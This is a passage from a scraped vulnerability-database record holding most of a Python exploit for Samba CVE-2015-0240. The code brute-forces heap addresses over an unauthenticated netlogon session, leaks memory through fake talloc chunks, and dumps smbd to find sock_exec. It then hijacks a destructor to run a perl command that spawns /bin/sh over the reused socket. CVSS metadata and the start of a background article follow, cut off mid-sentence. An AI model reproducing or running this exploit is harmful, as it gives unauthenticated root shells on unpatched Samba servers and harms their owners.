target\r\n \r\n def set_payload(self, s, pad_to_size=0):\r\n if pad_to_size > 0:\r\n s += '\\x00'*(pad_to_size-len(s))\r\n pad_size = 0\r\n if len(s) < (16*1024+1):\r\n ofsize = (len(s)+self.req_presize) % self.netlogon_data_fragment_size\r\n if ofsize > 0:\r\n pad_size = self.netlogon_data_fragment_size - ofsize\r\n \r\n self.accountName.fields['Data'] = s+'\\x00'*pad_size+'\\x00\\x00'\r\n self.accountName.fields['MaximumCount'] = None\r\n self.accountName.fields['ActualCount'] = None\r\n self.accountName.data = None # force recompute\r\n \r\n set_accountNameData = set_payload\r\n \r\n def get_dce(self):\r\n if self.dce is None or self.dce.lostconn:\r\n rpctransport = transport.DCERPCTransportFactory(r'ncacn_np:%s[\\PIPE\\netlogon]' % self.target)\r\n rpctransport.set_credentials('','') # NULL session\r\n rpctransport.set_dport(445)\r\n # force to 'NT LM 0.12' only\r\n rpctransport.preferred_dialect('NT LM 0.12')\r\n \r\n self.dce = rpctransport.get_dce_rpc()\r\n self.dce.connect()\r\n self.dce.bind(nrpc.MSRPC_UUID_NRPC)\r\n self.dce.lostconn = False\r\n return self.dce\r\n \r\n def get_socket(self):\r\n return self.dce.get_rpc_transport().get_socket()\r\n \r\n def force_dce_disconnect(self):\r\n if not (self.dce is None or self.dce.lostconn):\r\n self.get_socket().close()\r\n self.dce.lostconn = True\r\n \r\n def request_addr(self, addr):\r\n self.serverName.fields['ReferentID'] = addr\r\n \r\n dce = self.get_dce()\r\n try:\r\n dce.call(self.request.opnum, self.request)\r\n answer = dce.recv()\r\n return unpack(\"<IIII\", answer)\r\n except impacket.nmb.NetBIOSError as e:\r\n if e.args[0] != 'Error while reading from remote':\r\n raise\r\n dce.lostconn = True\r\n return None\r\n \r\n # call with no read\r\n def call_addr(self, addr):\r\n self.serverName.fields['ReferentID'] = addr\r\n \r\n dce = self.get_dce()\r\n try:\r\n dce.call(self.request.opnum, self.request)\r\n return True\r\n except impacket.nmb.NetBIOSError as e:\r\n if e.args[0] != 'Error while reading from remote':\r\n raise\r\n dce.lostconn = True\r\n return False\r\n \r\n def force_recv(self):\r\n dce = self.get_dce()\r\n return dce.get_rpc_transport().recv(forceRecv=True)\r\n \r\n def request_check_valid_addr(self, addr):\r\n answers = self.request_addr(addr)\r\n if answers is None:\r\n return False # connection lost\r\n elif answers[3] != 0:\r\n return True # error, expected\r\n else:\r\n raise Error('Unexpected result')\r\n \r\n \r\n# talloc constants\r\nTALLOC_MAGIC = 0xe8150c70 # for talloc 2.0\r\nTALLOC_FLAG_FREE = 0x01\r\nTALLOC_FLAG_LOOP = 0x02\r\nTALLOC_FLAG_POOL = 0x04\r\nTALLOC_FLAG_POOLMEM = 0x08\r\n \r\nTALLOC_HDR_SIZE = 0x30 # for 32 bit\r\n \r\nflag_loop = TALLOC_MAGIC | TALLOC_FLAG_LOOP # for checking valid address\r\n \r\n# Note: do NOT reduce target_payload_size less than 8KB. 4KB is too small buffer. cannot predict address.\r\nTARGET_PAYLOAD_SIZE = 8192\r\n \r\n########\r\n# request helper functions\r\n########\r\n \r\n# only one global requester\r\nrequester = Requester()\r\n \r\ndef force_dce_disconnect():\r\n requester.force_dce_disconnect()\r\n \r\ndef request_addr(addr):\r\n return requester.request_addr(addr)\r\n \r\ndef request_check_valid_addr(addr):\r\n return requester.request_check_valid_addr(addr)\r\n \r\ndef set_payload(s, pad_to_size=0):\r\n requester.set_payload(s, pad_to_size)\r\n \r\ndef get_socket():\r\n return requester.get_socket()\r\n \r\ndef call_addr(addr):\r\n return requester.call_addr(addr)\r\n \r\ndef force_recv():\r\n return requester.force_recv()\r\n \r\n########\r\n# find heap address\r\n########\r\n \r\n# only refs MUST be NULL, other never be checked\r\nfake_chunk_find_heap = pack(\"<IIIIIIII\",\r\n 0, 0, 0, 0, # refs\r\n flag_loop, flag_loop, flag_loop, flag_loop,\r\n)\r\n \r\ndef find_valid_heap_addr(start_addr, stop_addr, payload_size, first=False):\r\n \"\"\"\r\n below code can be used for checking valid heap address (no crash)\r\n \r\n if (unlikely(tc->flags & TALLOC_FLAG_LOOP)) {\r\n /* we have a free loop - stop looping */\r\n return 0;\r\n }\r\n \"\"\"\r\n global fake_chunk_find_heap\r\n payload = fake_chunk_find_heap*(payload_size/len(fake_chunk_find_heap))\r\n set_payload(payload)\r\n addr_step = payload_size\r\n addr = start_addr\r\n i = 0\r\n while addr > stop_addr:\r\n if i == 16:\r\n print(\" [*]trying addr: {:x}\".format(addr))\r\n i = 0\r\n \r\n if request_check_valid_addr(addr):\r\n return addr\r\n if first:\r\n # first time, the last 16 bit is still do not know\r\n # have to do extra check\r\n if request_check_valid_addr(addr+0x10):\r\n return addr+0x10\r\n addr -= addr_step\r\n i += 1\r\n return None\r\n \r\ndef find_valid_heap_exact_addr(addr, payload_size):\r\n global fake_chunk_find_heap\r\n fake_size = payload_size // 2\r\n while fake_size >= len(fake_chunk_find_heap):\r\n payload = fake_chunk_find_heap*(fake_size/len(fake_chunk_find_heap))\r\n set_payload(payload, payload_size)\r\n if not request_check_valid_addr(addr):\r\n addr -= fake_size\r\n fake_size = fake_size // 2\r\n \r\n set_payload('\\x00'*16 + pack(\"<I\", flag_loop), payload_size)\r\n # because glibc heap is align by 8\r\n # so the last 4 bit of address must be 0x4 or 0xc\r\n if request_check_valid_addr(addr-4):\r\n addr -= 4\r\n elif request_check_valid_addr(addr-0xc):\r\n addr -= 0xc\r\n else:\r\n print(\" [-] bad exact addr: {:x}\".format(addr))\r\n return 0\r\n \r\n print(\" [*] checking exact addr: {:x}\".format(addr))\r\n \r\n if (addr & 4) == 0:\r\n return 0\r\n \r\n # test the address\r\n \r\n # must be invalid (refs is AccountName.ActualCount)\r\n set_payload('\\x00'*12 + pack(\"<I\", flag_loop), payload_size)\r\n if request_check_valid_addr(addr-4):\r\n print(' [-] request_check_valid_addr(addr-4) failed')\r\n return 0\r\n # must be valid (refs is AccountName.Offset)\r\n # do check again if fail. sometimes heap layout is changed\r\n set_payload('\\x00'*8 + pack(\"<I\", flag_loop), payload_size)\r\n if not request_check_valid_addr(addr-8) and not request_check_valid_addr(addr-8) :\r\n print(' [-] request_check_valid_addr(addr-8) failed')\r\n return 0\r\n # must be invalid (refs is AccountName.MaxCount)\r\n set_payload('\\x00'*4 + pack(\"<I\", flag_loop), payload_size)\r\n if request_check_valid_addr(addr-0xc):\r\n print(' [-] request_check_valid_addr(addr-0xc) failed')\r\n return 0\r\n # must be valid (refs is ServerHandle.ActualCount)\r\n # do check again if fail. sometimes heap layout is changed\r\n set_payload(pack(\"<I\", flag_loop), payload_size)\r\n if not request_check_valid_addr(addr-0x10) and not request_check_valid_addr(addr-0x10):\r\n print(' [-] request_check_valid_addr(addr-0x10) failed')\r\n return 0\r\n \r\n return addr\r\n \r\ndef find_payload_addr(start_addr, start_payload_size, target_payload_size):\r\n print('[*] bruteforcing heap address...')\r\n \r\n start_addr = start_addr & 0xffff0000\r\n \r\n heap_addr = 0\r\n while heap_addr == 0:\r\n # loop from max to 0xb7700000 for finding heap area\r\n # offset 0x20000 is minimum offset from heap start to recieved data in heap\r\n stop_addr = 0xb7700000 + 0x20000\r\n good_addr = None\r\n payload_size = start_payload_size\r\n while payload_size >= target_payload_size:\r\n force_dce_disconnect()\r\n found_addr = None\r\n for i in range(3):\r\n found_addr = find_valid_heap_addr(start_addr, stop_addr, payload_size, good_addr is None)\r\n if found_addr is not None:\r\n break\r\n if found_addr is None:\r\n # failed\r\n good_addr = None\r\n break\r\n good_addr = found_addr\r\n print(\" [*] found valid addr ({:d}KB): {:x}\".format(payload_size//1024, good_addr))\r\n start_addr = good_addr\r\n stop_addr = good_addr - payload_size + 0x20\r\n payload_size //= 2\r\n \r\n if good_addr is not None:\r\n # try 3 times to find exact address. if address cannot be found, assume\r\n # minimizing payload size is not correct. start minimizing again\r\n for i in range(3):\r\n heap_addr = find_valid_heap_exact_addr(good_addr, target_payload_size)\r\n if heap_addr != 0:\r\n break\r\n force_dce_disconnect()\r\n \r\n if heap_addr == 0:\r\n print(' [-] failed to find payload adress')\r\n # start from last good address + some offset\r\n start_addr = (good_addr + 0x10000) & 0xffff0000\r\n print('[*] bruteforcing heap adress again from {:x}'.format(start_addr))\r\n \r\n payload_addr = heap_addr - len(fake_chunk_find_heap)\r\n print(\" [+] found payload addr: {:x}\".format(payload_addr))\r\n return payload_addr\r\n \r\n \r\n########\r\n# leak info\r\n########\r\n \r\ndef addr2utf_prefix(addr):\r\n def is_badchar(v):\r\n return (v >= 0xd8) and (v <= 0xdf)\r\n \r\n prefix = 0 # safe\r\n if is_badchar((addr)&0xff) or is_badchar((addr>>16)&0xff):\r\n prefix |= 2 # cannot have prefix\r\n if is_badchar((addr>>8)&0xff) or is_badchar((addr>>24)&0xff):\r\n prefix |= 1 # must have prefix\r\n return prefix\r\n \r\ndef leak_info_unlink(payload_addr, next_addr, prev_addr, retry=True, call_only=False):\r\n \"\"\"\r\n Note:\r\n - if next_addr and prev_addr are not zero, they must be writable address\r\n because of below code in _talloc_free_internal()\r\n if (tc->prev) tc->prev->next = tc->next;\r\n if (tc->next) tc->next->prev = tc->prev;\r\n \"\"\"\r\n # Note: U+D800 to U+DFFF is reserved (also bad char for samba)\r\n # check if '\\x00' is needed to avoid utf16 badchar\r\n prefix_len = addr2utf_prefix(next_addr) | addr2utf_prefix(prev_addr)\r\n if prefix_len == 3:\r\n return None # cannot avoid badchar\r\n if prefix_len == 2:\r\n prefix_len = 0\r\n \r\n fake_chunk_leak_info = pack(\"<IIIIIIIIIIII\",\r\n next_addr, prev_addr, # next, prev\r\n 0, 0, # parent, children\r\n 0, 0, # refs, destructor\r\n 0, 0, # name, size\r\n TALLOC_MAGIC | TALLOC_FLAG_POOL, # flag\r\n 0, 0, 0, # pool, pad, pad\r\n )\r\n payload = '\\x00'*prefix_len+fake_chunk_leak_info + pack(\"<I\", 0x80000) # pool_object_count\r\n set_payload(payload, TARGET_PAYLOAD_SIZE)\r\n if call_only:\r\n return call_addr(payload_addr + TALLOC_HDR_SIZE + prefix_len)\r\n \r\n for i in range(3 if retry else 1):\r\n try:\r\n answers = request_addr(payload_addr + TALLOC_HDR_SIZE + prefix_len)\r\n except impacket.dcerpc.v5.rpcrt.Exception:\r\n print(\"impacket.dcerpc.v5.rpcrt.Exception\")\r\n answers = None\r\n force_dce_disconnect()\r\n if answers is not None:\r\n # leak info must have next or prev address\r\n if (answers[1] == prev_addr) or (answers[0] == next_addr):\r\n break\r\n #print('{:x}, {:x}, {:x}, {:x}'.format(answers[0], answers[1], answers[2], answers[3]))\r\n answers = None # no next or prev in answers => wrong answer\r\n force_dce_disconnect() # heap is corrupted, disconnect it\r\n \r\n return answers\r\n \r\ndef leak_info_addr(payload_addr, r_out_addr, leak_addr, retry=True):\r\n # leak by replace r->out.return_authenticator pointer\r\n # Note: because leak_addr[4:8] will be replaced with r_out_addr\r\n # only answers[0] and answers[2] are leaked\r\n return leak_info_unlink(payload_addr, leak_addr, r_out_addr, retry)\r\n \r\ndef leak_info_addr2(payload_addr, r_out_addr, leak_addr, retry=True):\r\n # leak by replace r->out.return_authenticator pointer\r\n # Note: leak_addr[0:4] will be replaced with r_out_addr\r\n # only answers[1] and answers[2] are leaked\r\n return leak_info_unlink(payload_addr, r_out_addr-4, leak_addr-4, retry)\r\n \r\ndef leak_uint8t_addr(payload_addr, r_out_addr, chunk_addr):\r\n # leak name field ('uint8_t') in found heap chunk\r\n # do not retry this leak, because r_out_addr is guessed\r\n answers = leak_info_addr(payload_addr, r_out_addr, chunk_addr + 0x18, False)\r\n if answers is None:\r\n return None\r\n if answers[2] != TALLOC_MAGIC:\r\n force_dce_disconnect()\r\n return None\r\n \r\n return answers[0]\r\n \r\ndef leak_info_find_offset(info):\r\n # offset from pool to payload still does not know\r\n print(\"[*] guessing 'r' offset and leaking 'uint8_t' address ...\")\r\n chunk_addr = info['chunk_addr']\r\n uint8t_addr = None\r\n r_addr = None\r\n r_out_addr = None\r\n while uint8t_addr is None:\r\n # 0x8c10 <= 4 + 0x7f88 + 0x2044 - 0x13c0\r\n # 0x9ce0 <= 4 + 0x7f88 + 0x10d0 + 0x2044 - 0x13c0\r\n # 0xadc8 <= 4 + 0x7f88 + 0x10e8 + 0x10d0 + 0x2044 - 0x13c0\r\n # 0xad40 is extra offset when no share on debian\r\n # 0x10d38 is extra offset when only [printers] is shared on debian\r\n for offset in (0x8c10, 0x9ce0, 0xadc8, 0xad40, 0x10d38):\r\n r_addr = chunk_addr - offset\r\n # 0x18 is out.authenticator offset\r\n r_out_addr = r_addr + 0x18\r\n print(\" [*] try 'r' offset 0x{:x}, r_out addr: 0x{:x}\".format(offset, r_out_addr))\r\n \r\n uint8t_addr = leak_uint8t_addr(info['payload_addr'], r_out_addr, chunk_addr)\r\n if uint8t_addr is not None:\r\n print(\" [*] success\")\r\n break\r\n print(\" [-] failed\")\r\n if uint8t_addr is None:\r\n return False\r\n \r\n info['uint8t_addr'] = uint8t_addr\r\n info['r_addr'] = r_addr\r\n info['r_out_addr'] = r_out_addr\r\n info['pool_addr'] = r_addr - 0x13c0\r\n \r\n print(\" [+] text 'uint8_t' addr: {:x}\".format(info['uint8t_addr']))\r\n print(\" [+] pool addr: {:x}\".format(info['pool_addr']))\r\n \r\n return True\r\n \r\ndef leak_sock_fd(info):\r\n # leak sock fd from\r\n # smb_request->sconn->sock\r\n # (offset: ->0x3c ->0x0 )\r\n print(\"[*] leaking socket fd ...\")\r\n info['smb_request_addr'] = info['pool_addr']+0x11a0\r\n print(\" [*] smb request addr: {:x}\".format(info['smb_request_addr']))\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['smb_request_addr']+0x3c-4)\r\n if answers is None:\r\n print(' [-] cannot leak sconn_addr address :(')\r\n return None\r\n force_dce_disconnect() # heap is corrupted, disconnect it\r\n sconn_addr = answers[2]\r\n info['sconn_addr'] = sconn_addr\r\n print(' [+] sconn addr: {:x}'.format(sconn_addr))\r\n \r\n # write in padding of chunk, no need to disconnect\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], sconn_addr)\r\n if answers is None:\r\n print('cannot leak sock_fd address :(')\r\n return None\r\n sock_fd = answers[1]\r\n print(' [+] sock fd: {:d}'.format(sock_fd))\r\n info['sock_fd'] = sock_fd\r\n return sock_fd\r\n \r\ndef leak_talloc_pop_addr(info):\r\n # leak destructor talloc_pop() address\r\n # overwrite name field, no need to disconnect\r\n print('[*] leaking talloc_pop address')\r\n answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], info['pool_addr'] + 0x14)\r\n if answers is None:\r\n print(' [-] cannot leak talloc_pop() address :(')\r\n return None\r\n if answers[2] != 0x2010: # chunk size must be 0x2010\r\n print(' [-] cannot leak talloc_pop() address. answers[2] is wrong :(')\r\n return None\r\n talloc_pop_addr = answers[0]\r\n print(' [+] talloc_pop addr: {:x}'.format(talloc_pop_addr))\r\n info['talloc_pop_addr'] = talloc_pop_addr\r\n return talloc_pop_addr\r\n \r\ndef leak_smbd_server_connection_handler_addr(info):\r\n # leak address from\r\n # smbd_server_connection.smb1->fde ->handler\r\n # (offset: ->0x9c->0x14 )\r\n # MUST NOT disconnect after getting smb1_fd_event address\r\n print('[*] leaking smbd_server_connection_handler address')\r\n def real_leak_conn_handler_addr(info):\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['sconn_addr'] + 0x9c)\r\n if answers is None:\r\n print(' [-] cannot leak smb1_fd_event address :(')\r\n return None\r\n smb1_fd_event_addr = answers[1]\r\n print(' [*] smb1_fd_event addr: {:x}'.format(smb1_fd_event_addr))\r\n \r\n answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], smb1_fd_event_addr+0x14)\r\n if answers is None:\r\n print(' [-] cannot leak smbd_server_connection_handler address :(')\r\n return None\r\n force_dce_disconnect() # heap is corrupted, disconnect it\r\n smbd_server_connection_handler_addr = answers[0]\r\n diff = info['talloc_pop_addr'] - smbd_server_connection_handler_addr\r\n if diff > 0x2000000 or diff < 0:\r\n print(' [-] get wrong smbd_server_connection_handler addr: {:x}'.format(smbd_server_connection_handler_addr))\r\n smbd_server_connection_handler_addr = None\r\n return smbd_server_connection_handler_addr\r\n \r\n smbd_server_connection_handler_addr = None\r\n while smbd_server_connection_handler_addr is None:\r\n smbd_server_connection_handler_addr = real_leak_conn_handler_addr(info)\r\n \r\n print(' [+] smbd_server_connection_handler addr: {:x}'.format(smbd_server_connection_handler_addr))\r\n info['smbd_server_connection_handler_addr'] = smbd_server_connection_handler_addr\r\n \r\n return smbd_server_connection_handler_addr\r\n \r\ndef find_smbd_base_addr(info):\r\n # estimate smbd_addr from talloc_pop\r\n if (info['talloc_pop_addr'] & 0xf) != 0 or (info['smbd_server_connection_handler_addr'] & 0xf) != 0:\r\n # code has no alignment\r\n start_addr = info['smbd_server_connection_handler_addr'] - 0x124000\r\n else:\r\n start_addr = info['smbd_server_connection_handler_addr'] - 0x130000\r\n start_addr = start_addr & 0xfffff000\r\n stop_addr = start_addr - 0x20000\r\n \r\n print('[*] finding smbd loaded addr ...')\r\n while True:\r\n smbd_addr = start_addr\r\n while smbd_addr >= stop_addr:\r\n if addr2utf_prefix(smbd_addr-8) == 3:\r\n # smbd_addr is 0xb?d?e000\r\n test_addr = smbd_addr - 0x800 - 4\r\n else:\r\n test_addr = smbd_addr - 8\r\n # test writable on test_addr\r\n answers = leak_info_addr(info['payload_addr'], 0, test_addr, retry=False)\r\n if answers is not None:\r\n break\r\n smbd_addr -= 0x1000 # try prev page\r\n if smbd_addr > stop_addr:\r\n break\r\n print(' [-] failed. try again.')\r\n \r\n info['smbd_addr'] = smbd_addr\r\n print(' [+] found smbd loaded addr: {:x}'.format(smbd_addr))\r\n \r\ndef dump_mem_call_addr(info, target_addr):\r\n # leak pipes_struct address from\r\n # smbd_server_connection->chain_fsp->fake_file_handle->private_data\r\n # (offset: ->0x48 ->0xd4 ->0x4 )\r\n # Note:\r\n # - MUST NOT disconnect because chain_fsp,fake_file_handle,pipes_struct address will be changed\r\n # - target_addr will be replaced with current_pdu_sent address\r\n # check read_from_internal_pipe() in source3/rpc_server/srv_pipe_hnd.c\r\n print(' [*] overwrite current_pdu_sent for dumping memory ...')\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['smb_request_addr'] + 0x48)\r\n if answers is None:\r\n print(' [-] cannot leak chain_fsp address :(')\r\n return False\r\n chain_fsp_addr = answers[1]\r\n print(' [*] chain_fsp addr: {:x}'.format(chain_fsp_addr))\r\n \r\n answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], chain_fsp_addr+0xd4, retry=False)\r\n if answers is None:\r\n print(' [-] cannot leak fake_file_handle address :(')\r\n return False\r\n fake_file_handle_addr = answers[0]\r\n print(' [*] fake_file_handle addr: {:x}'.format(fake_file_handle_addr))\r\n \r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], fake_file_handle_addr+0x4-0x4, retry=False)\r\n if answers is None:\r\n print(' [-] cannot leak pipes_struct address :(')\r\n return False\r\n pipes_struct_addr = answers[2]\r\n print(' [*] pipes_struct addr: {:x}'.format(pipes_struct_addr))\r\n \r\n current_pdu_sent_addr = pipes_struct_addr+0x84\r\n print(' [*] current_pdu_sent addr: {:x}'.format(current_pdu_sent_addr))\r\n # change pipes->out_data.current_pdu_sent to dump memory\r\n return leak_info_unlink(info['payload_addr'], current_pdu_sent_addr-4, target_addr, call_only=True)\r\n \r\ndef dump_smbd_find_bininfo(info):\r\n def recv_till_string(data, s):\r\n pos = len(data)\r\n while True:\r\n data += force_recv()\r\n if len(data) == pos:\r\n print('no more data !!!')\r\n return None\r\n p = data.find(s, pos-len(s))\r\n if p != -1:\r\n return (data, p)\r\n pos = len(data)\r\n return None\r\n \r\n def lookup_dynsym(dynsym, name_offset):\r\n addr = 0\r\n i = 0\r\n offset_str = pack(\"<I\", name_offset)\r\n while i < len(dynsym):\r\n if dynsym[i:i+4] == offset_str:\r\n addr = unpack(\"<I\", dynsym[i+4:i+8])[0]\r\n break\r\n i += 16\r\n return addr\r\n \r\n print('[*] dumping smbd ...')\r\n dump_call = False\r\n # have to minus from smbd_addr because code section is read-only\r\n if addr2utf_prefix(info['smbd_addr']-4) == 3:\r\n # smbd_addr is 0xb?d?e000\r\n dump_addr = info['smbd_addr'] - 0x800 - 4\r\n else:\r\n dump_addr = info['smbd_addr'] - 4\r\n for i in range(8):\r\n if dump_mem_call_addr(info, dump_addr):\r\n mem = force_recv()\r\n if len(mem) == 4280:\r\n dump_call = True\r\n break\r\n print(' [-] dump_mem_call_addr failed. try again')\r\n force_dce_disconnect()\r\n if not dump_call:\r\n print(' [-] dump smbd failed')\r\n return False\r\n \r\n print(' [+] dump success. getting smbd ...')\r\n # first time, remove any data before \\7fELF\r\n mem = mem[mem.index('\\x7fELF'):]\r\n \r\n mem, pos = recv_till_string(mem, '\\x00__gmon_start__\\x00')\r\n print(' [*] found __gmon_start__ at {:x}'.format(pos+1))\r\n \r\n pos = mem.rfind('\\x00\\x00', 0, pos-1)\r\n dynstr_offset = pos+1\r\n print(' [*] found .dynstr section at {:x}'.format(dynstr_offset))\r\n \r\n dynstr = mem[dynstr_offset:]\r\n mem = mem[:dynstr_offset]\r\n \r\n # find start of .dynsym section\r\n pos = len(mem) - 16\r\n while pos > 0:\r\n if mem[pos:pos+16] == '\\x00'*16:\r\n break\r\n pos -= 16 # sym entry size is 16 bytes\r\n if pos <= 0:\r\n print(' [-] found wrong .dynsym section at {:x}'.format(pos))\r\n return None\r\n dynsym_offset = pos\r\n print(' [*] found .dynsym section at {:x}'.format(dynsym_offset))\r\n dynsym = mem[dynsym_offset:]\r\n \r\n # find sock_exec\r\n dynstr, pos = recv_till_string(dynstr, '\\x00sock_exec\\x00')\r\n print(' [*] found sock_exec string at {:x}'.format(pos+1))\r\n sock_exec_offset = lookup_dynsym(dynsym, pos+1)\r\n print(' [*] sock_exec offset {:x}'.format(sock_exec_offset))\r\n \r\n #info['mem'] = mem # smbd data before .dynsym section\r\n info['dynsym'] = dynsym\r\n info['dynstr'] = dynstr # incomplete section\r\n info['sock_exec_addr'] = info['smbd_addr']+sock_exec_offset\r\n print(' [+] sock_exec addr: {:x}'.format(info['sock_exec_addr']))\r\n \r\n # Note: can continuing memory dump to find ROP\r\n \r\n force_dce_disconnect()\r\n \r\n########\r\n# code execution\r\n########\r\ndef call_sock_exec(info):\r\n prefix_len = addr2utf_prefix(info['sock_exec_addr'])\r\n if prefix_len == 3:\r\n return False # too bad... cannot call\r\n if prefix_len == 2:\r\n prefix_len = 0\r\n fake_talloc_chunk_exec = pack(\"<IIIIIIIIIIII\",\r\n 0, 0, # next, prev\r\n 0, 0, # parent, child\r\n 0, # refs\r\n info['sock_exec_addr'], # destructor\r\n 0, 0, # name, size\r\n TALLOC_MAGIC | TALLOC_FLAG_POOL, # flag\r\n 0, 0, 0, # pool, pad, pad\r\n )\r\n chunk = '\\x00'*prefix_len+fake_talloc_chunk_exec + info['cmd'] + '\\x00'\r\n set_payload(chunk, TARGET_PAYLOAD_SIZE)\r\n for i in range(3):\r\n if request_check_valid_addr(info['payload_addr']+TALLOC_HDR_SIZE+prefix_len):\r\n print('waiting for shell :)')\r\n return True\r\n print('something wrong :(')\r\n return False\r\n \r\n########\r\n# start work\r\n########\r\n \r\ndef check_exploitable():\r\n if request_check_valid_addr(0x41414141):\r\n print('[-] seems not vulnerable')\r\n return False\r\n if request_check_valid_addr(0):\r\n print('[+] seems exploitable :)')\r\n return True\r\n \r\n print(\"[-] seems vulnerable but I cannot exploit\")\r\n print(\"[-] I can exploit only if 'creds' is controlled by 'ReferentId'\")\r\n return False\r\n \r\ndef do_work(args):\r\n info = {}\r\n \r\n if not (args.payload_addr or args.heap_start or args.start_payload_size):\r\n if not check_exploitable():\r\n return\r\n \r\n start_size = 512*1024 # default size with 512KB\r\n if args.payload_addr:\r\n info['payload_addr'] = args.payload_addr\r\n else:\r\n heap_start = args.heap_start if args.heap_start else 0xb9800000+0x30000\r\n if args.start_payload_size:\r\n start_size = args.start_payload_size * 1024\r\n if start_size < TARGET_PAYLOAD_SIZE:\r\n start_size = 512*1024 # back to default\r\n info['payload_addr'] = find_payload_addr(heap_start, start_size, TARGET_PAYLOAD_SIZE)\r\n \r\n # the real talloc chunk address that stored the raw netlogon data\r\n # serverHandle 0x10 bytes. accountName 0xc bytes\r\n info['chunk_addr'] = info['payload_addr'] - 0x1c - TALLOC_HDR_SIZE\r\n print(\"[+] chunk addr: {:x}\".format(info['chunk_addr']))\r\n \r\n while not leak_info_find_offset(info):\r\n # Note: do heap bruteforcing again seems to be more effective\r\n # start from payload_addr + some offset\r\n print(\"[+] bruteforcing heap again. start from {:x}\".format(info['payload_addr']+0x10000))\r\n info['payload_addr'] = find_payload_addr(info['payload_addr']+0x10000, start_size, TARGET_PAYLOAD_SIZE)\r\n info['chunk_addr'] = info['payload_addr'] - 0x1c - TALLOC_HDR_SIZE\r\n print(\"[+] chunk addr: {:x}\".format(info['chunk_addr']))\r\n \r\n got_fd = leak_sock_fd(info)\r\n \r\n # create shell command for reuse sock fd\r\n cmd = \"perl -e 'use POSIX qw(dup2);$)=0;$>=0;\" # seteuid, setegid\r\n cmd += \"dup2({0:d},0);dup2({0:d},1);dup2({0:d},2);\".format(info['sock_fd']) # dup sock\r\n # have to kill grand-grand-parent process because sock_exec() does fork() then system()\r\n # the smbd process still receiving data from socket\r\n cmd += \"$z=getppid;$y=`ps -o ppid= $z`;$x=`ps -o ppid= $y`;kill 15,$x,$y,$z;\" # kill parents\r\n cmd += \"\"\"print \"shell ready\\n\";exec \"/bin/sh\";'\"\"\" # spawn shell\r\n info['cmd'] = cmd\r\n \r\n # Note: cannot use [email\u00a0protected] because binary is PIE and chunk dtor is called in libtalloc.\r\n # the ebx is not correct for resolving the system address\r\n smbd_info = {\r\n 0x5dd: { 'uint8t_offset': 0x711555, 'talloc_pop': 0x41a890, 'sock_exec': 0x0044a060, 'version': '3.6.3-2ubuntu2 - 3.6.3-2ubuntu2.3'},\r\n 0xb7d: { 'uint8t_offset': 0x711b7d, 'talloc_pop': 0x41ab80, 'sock_exec': 0x0044a380, 'version': '3.6.3-2ubuntu2.9'},\r\n 0xf7d: { 'uint8t_offset': 0x710f7d, 'talloc_pop': 0x419f80, 'sock_exec': 0x00449770, 'version': '3.6.3-2ubuntu2.11'},\r\n 0xf1d: { 'uint8t_offset': 0x71ff1d, 'talloc_pop': 0x429e80, 'sock_exec': 0x004614b0, 'version': '3.6.6-6+deb7u4'},\r\n }\r\n \r\n leak_talloc_pop_addr(info) # to double check the bininfo\r\n bininfo = smbd_info.get(info['uint8t_addr'] & 0xfff)\r\n if bininfo is not None:\r\n smbd_addr = info['uint8t_addr'] - bininfo['uint8t_offset']\r\n if smbd_addr + bininfo['talloc_pop'] == info['talloc_pop_addr']:\r\n # correct info\r\n print('[+] detect smbd version: {:s}'.format(bininfo['version']))\r\n info['smbd_addr'] = smbd_addr\r\n info['sock_exec_addr'] = smbd_addr + bininfo['sock_exec']\r\n print(' [*] smbd loaded addr: {:x}'.format(smbd_addr))\r\n print(' [*] use sock_exec offset: {:x}'.format(bininfo['sock_exec']))\r\n print(' [*] sock_exec addr: {:x}'.format(info['sock_exec_addr']))\r\n else:\r\n # wrong info\r\n bininfo = None\r\n \r\n got_shell = False\r\n if bininfo is None:\r\n # no target binary info. do a hard way to find them.\r\n \"\"\"\r\n leak smbd_server_connection_handler for 2 purposes\r\n - to check if compiler does code alignment\r\n - to estimate smbd loaded address\r\n - gcc always puts smbd_server_connection_handler() function at\r\n beginning area of .text section\r\n - so the difference of smbd_server_connection_handler() offset is\r\n very low for all smbd binary (compiled by gcc)\r\n \"\"\" \r\n leak_smbd_server_connection_handler_addr(info)\r\n find_smbd_base_addr(info)\r\n dump_smbd_find_bininfo(info)\r\n \r\n # code execution\r\n if 'sock_exec_addr' in info and call_sock_exec(info):\r\n s = get_socket()\r\n print(s.recv(4096)) # wait for 'shell ready' message\r\n s.send('uname -a\\n')\r\n print(s.recv(4096))\r\n s.send('id\\n')\r\n print(s.recv(4096))\r\n s.send('exit\\n')\r\n s.close()\r\n \r\n \r\ndef hex_int(x):\r\n return int(x,16)\r\n \r\n# command arguments\r\nparser = argparse.ArgumentParser(description='Samba CVE-2015-0240 exploit')\r\nparser.add_argument('target', help='target IP address')\r\nparser.add_argument('-hs', '--heap_start', type=hex_int,\r\n help='heap address in hex to start bruteforcing')\r\nparser.add_argument('-pa', '--payload_addr', type=hex_int,\r\n help='exact payload (accountName) address in heap. If this is defined, no heap bruteforcing')\r\nparser.add_argument('-sps', '--start_payload_size', type=int,\r\n help='start payload size for bruteforcing heap address in KB. (128, 256, 512, ...)')\r\n \r\nargs = parser.parse_args()\r\nrequester.set_target(args.target)\r\n \r\n \r\ntry:\r\n do_work(args)\r\nexcept KeyboardInterrupt:\r\n pass\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23513"}], "myhack58": [{"lastseen": "2016-10-28T18:45:46", "bulletinFamily": "info", "description": "## 1 demo\n\n## [](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/#h2_ \u80cc\u666f>)2 background\n\n2 0 1 5 year 2 Month 2 3 day, the Red Hat product security team released a Samba service end of the smbd vulnerability announcement [1], the vulnerability number is[CVE-2 0 1 5-0 2 4 0](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0240>), almost affect all versions. The vulnerability trigger is not needed by the Samba server account authentication, and the smbd service end 